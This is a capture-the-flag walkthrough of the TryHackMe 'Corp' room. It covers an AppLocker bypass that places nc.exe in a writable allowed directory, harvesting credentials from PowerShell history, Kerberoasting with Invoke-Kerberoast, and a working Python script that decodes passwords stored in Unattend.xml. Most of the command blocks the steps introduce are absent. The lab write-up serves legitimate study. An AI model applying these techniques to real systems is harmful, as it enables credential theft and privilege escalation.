Bypass AppLocker whitelisting and capture Kerberos service tickets to escalate privileges. Technical walkthrough of the Corp room on the TryHackMe platform.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use information at your own risk. By continuing to read, you acknowledge the aforementioned user risks/responsibilities.
Bypassing AppLocker
AppLocker is a Windows feature used to whitelist the programs a given user or group is allowed to run. Rules can allow or deny execution based on file path, file hash, or application publisher (the signing certificate).
The bypass works by placing the executable in a directory that is covered by an allow rule (the default path rules permit everything under the Windows directory) but that the current user can still write to:
Using PowerShell to download the nc executable into that directory:
nc.exe then executes successfully from that folder, bypassing AppLocker.
PowerShell history location:
Print the contents of the PowerShell history file (it can hold credentials typed in earlier sessions):
Kerberoasting
Extract SPNs from Active Directory:
The SPN enumerated belongs to the user CN=fela,CN=Users,DC=corp,DC=Local. A user account with an SPN is Kerberoastable: any domain user can request a service ticket for it, and the ticket is encrypted with that account's password hash.
Empire - Invoke-Kerberoast
Github link: https://github.com/EmpireProject/Empire
Upload Invoke-Kerberoast.ps1 to the target:
Add a line inside Invoke-Kerberoast.ps1 that invokes the function, so running the script produces the hashes:
TGS service ticket hash (it must be saved as a single line; console output wraps it):
Crack the Kerberos 5 TGS hash:
Log in as the user
Start an RDP session with xfreerdp:
Escalate Privileges with PowerUp.ps1
Download it to the target:
(caught by AV in my case)
Check Unattend.xml for stored passwords
The password is Base64-encoded by default (the PlainText element is false); decode it to recover the cleartext.
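As an added example that is not from the blog, a small parser for the password elements in an Unattend.xml, run here against a constructed file rather than the Corp room's. Windows System Image Manager writes the Value as Base64 of the UTF-16LE password with the literal string "Password" appended and sets PlainText to false; hand-edited files often carry plain Base64 of the ASCII password instead, so the decoder handles both forms and honours PlainText. The account name svc_deploy and both passwords are made up for the sample.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample unattend file (not the Corp room's) with the two usual
# password carriers: UserAccounts/AdministratorPassword and AutoLogon/Password.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>UABhAHMAcwB3AG8AcgBkADEAUABhAHMAcwB3AG8AcgBkAA==</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Username>svc_deploy</Username>
        <Password>
          <Value>c3VwZXJzZWNyZXQ=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""


def local_name(tag: str) -> str:
    """Strip the XML namespace prefix ET attaches to element tags."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_password(value: str, plain_text: bool) -> str:
    """Recover the cleartext from a <Value> element.

    Windows SIM stores Base64(UTF-16LE(password + "Password")) with PlainText=false;
    hand-edited files often hold Base64 of the raw ASCII password instead.
    """
    if plain_text:
        return value
    raw = base64.b64decode(value)
    # UTF-16LE text of an ASCII password has a NUL in every second byte.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le")
        return text[:-len("Password")] if text.endswith("Password") else text
    return raw.decode("utf-8", errors="replace")


def extract_unattend_passwords(xml_text):
    """Return (element, account or None, cleartext) for every password element."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    found = []
    for parent in ET.fromstring(data).iter():
        account = None
        for child in parent:  # AutoLogon/LocalAccount keep the user name as a sibling
            if local_name(child.tag) in ("Username", "Name") and child.text:
                account = child.text.strip()
        for child in parent:
            if local_name(child.tag) not in ("AdministratorPassword", "Password"):
                continue
            fields = {local_name(c.tag): (c.text or "").strip() for c in child}
            if "Value" not in fields:
                continue
            plain = fields.get("PlainText", "false").lower() == "true"
            found.append((local_name(child.tag), account,
                          decode_unattend_password(fields["Value"], plain)))
    return found


if __name__ == "__main__":
    for element, account, secret in extract_unattend_passwords(SAMPLE_UNATTEND):
        print(f"{element:<22} {account or '-':<12} {secret}")
```

Point it at C:\Windows\Panther\Unattend.xml or the sysprep copies under C:\Windows\Panther\Unattend\ and C:\Windows\System32\Sysprep\ once you have a shell; the same elements appear in all of them.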
Log in as Administrator:
Capture the flag
The flag is located at C:\Users\Administrator\Desktop\flag.txt